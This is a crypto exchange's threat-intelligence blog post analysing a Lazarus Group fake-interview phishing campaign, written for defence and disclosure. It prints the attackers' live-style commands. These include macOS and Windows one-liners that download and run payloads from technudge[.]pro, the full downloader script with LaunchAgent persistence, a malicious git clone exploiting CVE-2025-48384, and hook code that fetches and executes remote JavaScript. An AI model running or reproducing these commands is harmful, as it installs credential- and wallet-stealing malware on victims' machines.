KuCoin
登錄
language_currency
主頁
Blog 列表
Tips and Tricks
詳情
img

Breaking: Lazarus Group (APT38) Targets Crypto Sector with Sophisticated Phishing Campaign

2025/08/28 09:00:03

Custom Image

Summary

KuCoin's security team has recently identified new phishing attack samples linked to the notorious Lazarus Group (APT38) — a state-sponsored hacking collective known for its financially motivated cyberattacks. Backed by significant government resources, this group remains one of the most active and dangerous threat actors in the world.
 

Who Are They Targeting?

Over the past decade, Lazarus Group has heavily focused on financial institutions and cryptocurrency-related businesses, employing a hybrid attack strategy—casting a wide net before zeroing in on high-value targets. Their tactics are highly adaptive, and they’ve even been caught targeting security researchers in the past to steal unreported vulnerabilities [1].
 

How Do They Operate?

The group employs multiple sophisticated attack vectors, including:
  • Spear-phishing - Fake job posts, impersonated emails, and social engineering
  • Watering hole attacks - Compromising frequently visited websites
  • Supply chain attacks - Planting malicious code in dev repositories (e.g., poisoned Git/npm packages)
  • Tailored social engineering - Customized scams based on victim profiles

The Latest Attack Pattern

The operation typically begins on platforms like LinkedIn, Telegram, or Twitter, where attackers pose as recruiters. Their goal? To trick targets into participating in a fake interview process, ultimately leading to malware installation-stealing credentials/passwords from victims’ devices and browsers, then draining their crypto wallets.
For technical professionals:
  • Victims are asked to complete a "coding test"—which involves pulling and running malicious code.
  • Recent attacks have even exploited CVE-2025-48384 (a newly disclosed vulnerability).
For non-technical targets:
  • Attackers fake technical issues (e.g., "camera not working") to push victims into running malicious scripts.
This campaign follows their well-established playbook:
1️⃣ Fake job postings → 2️⃣ Multi-stage "interviews" → 3️⃣ Malware deployment

Recent Attack Incident:

Targeting Non-Technical Staff

Attack Flowchart:
Custom Image
 
In attacks targeting non-technical personnel, threat actors have been using LinkedIn and X (Twitter) to conduct fake interview phishing. The malicious files used in this incident show strong similarities to those found in late 2024 LinkedIn recruitment scams [2]. We've also identified additional obfuscated samples [3] from public sources for reference. Here's how the attack unfolds:
 
1️⃣ The Hook Attackers first lure victims via LinkedIn messages with fake interview offers.
Custom Image
 
2️⃣ The Trap
 
Victims are directed to a malicious site (https[:]//aptiscore[.]com/invite/LrTeFJdXBB2pe) where they're asked to:
  • Complete multiple forms
  • Click "Continue" repeatedly
  • Enter personal information

This lengthy process keeps victims focused on the fake website.

Custom Image

Custom Image

3️⃣ The Payload
 
During the "video interview" phase, the site claims:
 
"Camera driver missing"
Attackers then:
  • Spam pop-ups to create urgency
  • Instruct victims to run terminal commands:

Custom Image

Custom Image

On macOS:
 
Victims are tricked into executing:
 
Custom Image
 
#1、Visit https[:]//technudge[.]pro/adrivmac-sh5c.sh, #2、Download to /var/tmp/cdrivMac.sh #3、Run the file by curl: curl -k -o /var/tmp/cdrivMac.sh https[:]//technudge[.]pro/adrivmac-sh5c.sh && chmod +x /var/tmp/cdrivMac.sh && nohup bash /var/tmp/cdrivMac.sh >/dev/null 2>&1 &
 
This downloads cdrivMac.sh - a downloader/persistence tool containing:

#!/bin/bash ZRNAIZP_ARM64="https[:]//technudge[.]pro/adriv-arm64.update" ZRXISDP_INTEL="https[:]//technudge[.]pro/adriv-intel.update" ZKDCDU_FILE="/var/tmp/CDrivers.zip" SWOR_KDIRS="/var/tmp/CDrivers" SPTPATH="cloud.sh" RDHDDSU_NAME="ChAudioFixer.app" LUDSSYTDPATH=~/Library/LaunchAgents/com.drive.plist case $(uname -m) in arm64) ZIBVDSCCG_ULR=$ZRNAIZP_ARM64 ;; x86_64) ZIBVDSCCG_ULR=$ZRXISDP_INTEL ;; *) exit 1 ;; esac drvup mkdir -p "$SWOR_KDIRS" cleanup() { rm -rf "$ZKDCDU_FILE" } if curl -s -o "$ZKDCDU_FILE" "$ZIBVDSCCG_ULR" && [[ -f "$ZKDCDU_FILE" ]]; then unzip -o -qq "$ZKDCDU_FILE" -d "$SWOR_KDIRS" if [[ -f "$SWOR_KDIRS/$SPTPATH" ]]; then chmod +x "$SWOR_KDIRS/$SPTPATH" "$SWOR_KDIRS/$SPTPATH" & else cleanup exit 1 fi else cleanup exit 1 fi mkdir -p ~/Library/LaunchAgents cat > "$LUDSSYTDPATH" <<EOL <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple[.]com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Label</key> <string>com.audiodrive</string> <key>ProgramArguments</key> <array> <string>$SWOR_KDIRS/$SPTPATH</string> </array> <key>RunAtLoad</key> <true/> <key>KeepAlive</key> <false/> </dict> </plist> EOL chmod 644 "$LUDSSYTDPATH" if ! launchctl list | grep -q "com.audiodrive"; then launchctl load "$LUDSSYTDPATH" fi if [[ -d "$SWOR_KDIRS/$RDHDDSU_NAME" ]]; then open "$SWOR_KDIRS/$RDHDDSU_NAME" & fi cleanup
 

Malware Analysis

The script performs two key functions:
  1. Malware Download
  • Downloads ZIP from:
  • https[:]//technudge[.]pro/adriv-arm64.update
  • https[:]//technudge[.]pro/adriv-intel.update
  • Saves to: /var/tmp/CDrivers.zip
  • File structure:
  • File structure:

├── cloud.sh
├── driverupdate.go
├── core
│   ├── loop.go
│   └── work.go
├── config
│   └── constans.go
├── ChAudioFixer.app
│   └── Contents
│       ├── MacOS
│       │   └── ChAudioFixer
│       ├── ...
├── auto
│   ├── basic.go
│   ├── chrome_change_pref.go
│   ├── chrome_cookie_darwin.go
│   ├── chrome_cookie_other.go
│   ├── chrome_cookie_win.go
│   └── chrome_gather.go
├── command
│   └── stackcmd.go
├── bin
│   ├── go
│   └── gofmt
├── doc
│   ├── asm.html
│   ├── ...
├── ...
;

Key malicious components:

 
files
content
cloud.sh
Script file for compiling and executing GO source code
ChAudioFixer.app
Disguised utility for password theft
go
GO language compilation and executable
 
Notably, config/constants.go reveals capabilities to:
  • Harvest system info
  • Enable remote file control
  • Steal cookies, saved passwords & crypto wallets

 Custom Image

  1. Persistence Mechanism
  • Creates LaunchAgent plist: ~/Library/LaunchAgents/com.drive.plist

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple[.]com/DTDs/PropertyList-1.0.dtd">

<plist version="1.0">

<dict>

    <key>Label</key>

    <string>com.audiodrive</string>

    <key>ProgramArguments</key>

    <array>

        <string>/var/tmp/CDrivers/cloud.sh</string>

    </array>

    <key>RunAtLoad</key>

    <true/>

    <key>KeepAlive</key>

    <false/>

</dict>

</plist>

 
Auto-executes /var/tmp/CDrivers/cloud.sh on login, which establishes continued attacks
 

Connection to Past Attacks

 
The attack kit remains consistent with historical samples, including:
 
Custom Image
Custom Image
  • Continued use of dropbox[.]com for mac system password exfiltration, though newer variants now employ URLComponents for configuration - avoiding plaintext domain exposure in communications.
  • Standard IP check via https[:]//api.ipify[.]org

Custom Image

Custom Image
 

On Windows:

 
The attackers guide victims to execute specific commands via cmd/PowerShell, which initiates a connection to the malicious domainhttps[:]//technudge[.]pro/adrivwin-sh5c.update to download and extract the payload to the %TEMP%\cdrivWin directory. Using a LOLbins technique, they then employ wscript.exe to execute the malicious script %TEMP%\update.vbs.
 
Custom Image
 

Powershell:

 
Invoke-WebRequest -Uri "https[:]//technudge[.]pro/adrivwin-sh5c[.]update" -OutFile "$env:TEMP\cdrivWin.zip" -UseBasicParsing; Expand-Archive -Force -Path "$env:TEMP\cdrivWin.zip" -DestinationPath "$env:TEMP\cdrivWin"; Start-Process "wscript.exe" -ArgumentList "`"$env:TEMP\cdrivWin\update.vbs`""
 

Cmd:

 
curl -k -o "%TEMP%\cdrivWin.zip" https[:]//technudge[.]pro/adrivwin-sh5c.update && powershell -Command "Expand-Archive -Force -Path '%TEMP%\cdrivWin.zip' -DestinationPath '%TEMP%\cdrivWin'" && wscript "%TEMP%\cdrivWin\update.vbs"
 
The downloaded and extracted files include:
 
Custom Image
The malicious script update.vbs performs the following actions:
  • Extracts Lib.zip into the current directory
  • Executes the main payload nvidia.py through a renamed python.exe(disguised as csshost.exe) to evade detection by security products
Custom Image
 
  • File structure:

├─update.vbs #extract; launch the main program

├─csshost.exe #python

├─config.py #config file

├─nvidia.py #main function

├─auto.py #automatically steal cokkies, saved passwords & crypto wallets

├─api.py #initiate encrypted communication to 38.146.28[.]177:8080

├─command.py #implementation

├─.....

 
Persistence and Post-Exploitation Activities
  1. Persistence Mechanism
  1. The script adds update.vbs to the Windows startup registry key:
  1. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  1. This ensures the malware automatically executes upon system reboot.
  1. Enable config's remote control function
  • Harvest system info
  • Enable remote file control
  • Steal cookies, saved passwords & crypto wallets

Custom Image

Custom Image

Targeting Technical Professionals

Attack Flowchart:

Custom Image
 
In attacks targeting technical personnel, the attackers employ multiple sophisticated vectors:
These methods trick victims into pulling and executing malicious code. Recent analyses of npm poisoning incidents [8] have documented these techniques in detail. As of this writing, the attackers have updated their GitHub projects [9], substituting new malicious npm packages (matrix-charts, rtklog) to maintain their campaign.
 
Custom ImageCustom Image
Custom ImageCustom Image
 
Beyond conventional npm poisoning, the attackers also leverage newly disclosed vulnerabilities (CVE-2025-48384) when targeting cryptocurrency professionals. The attack unfolds as follows:
  1. The attackers review the victim’s resume and initiate a fake interview via Telegram, posing as a recruiter.
  2. Under the guise of "evaluating the victim’s understanding of company projects," they lure the target into cloning a malicious GitLab repository with the command:
git clone --recursive https[:]//guest:glpat-2xxxxxxyx@gitlab.tresalabs[.]com/product/delivery.git

Technical Execution:

  • During git clone --recursive, Git reads the path as api/db_drivers^M but writes to api/db_drivers.
Custom Image
  • The api/db_drivers directory is a symbolic link pointing to ../.git/modules/api/db_drivers/.
  • Attackers embed a malicious hooks/check-out script here:

Custom Image

Triggering the Payload:
  • The git checkout operation (default during cloning) executes ../.git/modules/api/db_drivers/hooks/post-checkout.
  • This triggers node mongodb.hook.js, establishing a backdoor connection.
  • The attackers then clean and replace the entire project to cover their tracks.

 

node hooks/mongodb.hook.js > /dev/null 2>&1 &
cp hooks/release.zip /tmp/release.zip
cd ../../../..
sleep 3 && find . -mindepth 1 -delete > /dev/null 2>&1 && unzip /tmp/release.zip > /dev/null 2>&1 && rm -f /tmp/release.zip > /dev/null 2>&1 && cp -R release/ ./ > /dev/null 2>&1 && rm -rf release > /dev/null 2>&1
 
Excerpt from mongodb.hook.js:
 
#Receive Base64-encoded JavaScript code from the server and execute it.
const url = 'https[:]//gitlab.tresalabs[.]com:8443/api/v4/project';
vm.runInNewContext(Buffer.from(data["data"], 'base64'), mc);
 

Additional Tactics:

We’ve also observed alternate exploits of CVE-2025-48384 against cryptocurrency firms:
  • When victims use git commit, Git automatically triggers a malicious pre-commit hook, executing the backdoor.

Summary & Key Takeaways

In this attack analysis, we’ve exposed a recent phishing and malware campaign by APT-38 (Lazarus Group), reaffirming the group’s persistent focus on cryptocurrency theft as a primary motive.
 

Attack Highlights

  • Social Engineering Lure: Attackers pose as recruiters, tricking victims into installing malware under the guise of "skills assessments."
  • Data & Crypto Theft: Once infected, the malware harvests sensitive information and drains cryptocurrency wallets.
  • Strong Infrastructure: The group maintains a vast network of active IPs and continuously updated malware, indicating substantial financial backing and long-term commitment to targeting crypto users.

Critical Reminders

 
For Organizations & Individuals:
  • Never execute unknown files, regardless of operating system.
  • Treat unsolicited job interviews with extreme skepticism, especially those involving coding tests or system checks.
  • Assume breach risks—malware can silently compromise systems, leading to data leaks, financial theft, or worse.
Stay vigilant. Security starts with skepticism.

Appendix:

Malicious Indicators of Compromise (IOCs)

  1. Malicious External Domains
https[:]//aptiscore[.]com
https[:]//technudge[.]pro
38.146.28[.]177
gitlab.tresalabs[.]com
  1. Malware Files:
Filename
MD5
SHA-256
cdrivMac.sh
5c9af548cb39a3a2b4f7a91aad0cdccc
cd68b8c00708844fefaff84f23f97a67bedbee814888d172a530752d3d8a2cae
CDrivers.zip
df994bd9153914e66ceee3f8bcb93527
c17aa46954ed1b9cd147e674de3f25520b1dfcaa20778a36b6957da1b291f0d3
CDrivers (1).zip
a6add56c8c3cda2a4a247632aa7fc3ea
f0b2095e384e253bff6fff3a20608112be0d0c2ed0bce9d29e04fbd02d33c089
cloud.sh
61c88b66dc906667ecb9387c0678a1dd
7b84d1d1ad0887dd0e545d0ba86c4e641c136ff8231f847bbf227fc5add25558
driverupdate.go
c184aa82bd9e70445003a4f3dd4de0b3
0a03ca9e4b836d54005335e8cedda91f52c99308b5fe1b529b26d810956e5588
ChAudioFixer
35195bb1f3247be5532a9f0d3712cc13
6f7a0864e4b2e9c09121b5a26dd07825daeffeabb8150d2e9d82b0f3b81649fa
  1. Additional Phishing Sites:
URI pattern analysis indicates this attack template entered operational use approximately four months before the current campaign.
No.
url
IP
1
212.85.29.40
2
212.85.29.149
3
51.210.235.42
4
46.202.196.24
5
 
6
51.210.235.45
7
31.220.40.22
8
78.110.166.82
  1. References:

[1]New campaign targeting security researchers

https[:]//blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/

[2]North Korea-nexus Golang Backdoor/Stealer from Contagious Interview campaign

https[:]//dmpdump.github.io/posts/NorthKorea_Backdoor_Stealer/

[3]Lazarus’ latest tactics: Deceptive development and ClickFix

https[:]//www.gendigital[.]com/blog/insights/research/deceptive-nvidia-attack

[4]North Korean APT Lazarus Targets Developers with Malicious npm Package

https[:]//socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package

[5]The npm security holding package

https[:]//www.npmjs[.]com/package/postcss-optimizer

[6]Beyond the Pond Phish: Unraveling Lazarus Group’s Evolving Tactics

https[:]//blog.bitmex[.]com/bitmex-busts-lazarus-group/

[7]Personal GitHub repository

https[:]//github[.]com/astraea-dot-sh/0x50d4.github.io/blob/main/_posts/2024-04-03-python-malware.md

[8]Threat Intelligence: Uncovering a Web3 Interview Scam

https[:]//slowmist.medium[.]com/threat-intelligence-uncovering-a-web3-interview-scam-bb366694b7f3

[9]Attack GitHub project

https[:]//github[.]com/EvaCodes-Community/UltraX

[10]cors-parser' npm Package Hides Cross-Platform Backdoor in PNG Files

https[:]//www.sonatype[.]com/blog/cors-parser-npm-package-hides-cross-platform-backdoor-in-png-files